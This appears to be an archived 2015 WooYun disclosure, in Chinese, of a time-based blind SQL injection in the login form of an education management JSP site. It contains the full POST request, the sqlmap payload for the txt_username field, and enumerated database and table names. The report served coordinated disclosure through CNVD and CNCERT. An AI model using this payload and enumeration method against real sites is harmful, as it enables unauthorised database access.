乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-19: 细节已通知厂商并且等待厂商处理中 2015-10-23: 厂商已经确认,细节仅向厂商公开 2015-11-02: 细节向核心白帽子及相关领域专家公开 2015-11-12: 细节向普通白帽子公开 2015-11-22: 细节向实习白帽子公开 2015-12-07: 细节向公众公开
RT
POST /manageredu/enter.jsp HTTP/1.1Content-Length: 192Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://**.**.**.**:80/Cookie: JSESSIONID=1F19EF1F96825DB4BA904FA19078175E; JSESSIONID=1F19EF1F96825DB4BA904FA19078175E; AJSTAT_ok_pages=10; AJSTAT_ok_times=1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*hdn_submit_sign=submit&txt_password=g00dPa%24%24w0rD&txt_username=*
txt_username参数存在注入
qlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: hdn_submit_sign=submit&txt_password=g00dPa$$w0rD&txt_username=') AND (SELECT * FROM (SELECT(SLEEP(5)))otmI) AND ('uBut'='uBut---web application technology: JSPback-end DBMS: MySQL 5.0.12sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: hdn_submit_sign=submit&txt_password=g00dPa$$w0rD&txt_username=') AND (SELECT * FROM (SELECT(SLEEP(5)))otmI) AND ('uBut'='uBut---web application technology: JSPback-end DBMS: MySQL 5.0.12available databases [4]:[*] edu[*] information_schema[*] mysql[*] test
跑了一下表
Database: mysql[17 tables]+---------------------------+| user || columns_priv || db || func || help_category || help_keyword || help_relation || help_topic || host || proc || procs_priv || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+---------------------------+
Database: edu[34 tables]+--------------------+| NewTable || adcounter || area_code || attach || broad || broad_content || degree1_code || dept_code || dept_user_code || dir_attach || flow_code || flow_content || flow_log || general_code || jyfa_tixing || jyfauploadlog || logs || role_code || school_code || school_user_code || special_code || special_logs || t_ad || t_ad_posion || t_article || t_article_contents || t_channel_article || t_links || t_lqk06 || tbl_channel || tbl_nation || tech_post_code || upload_file || zhiwei_code |+--------------------+
就不深入了.
危害等级:高
漏洞Rank:10
确认时间:2015-10-23 11:24
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无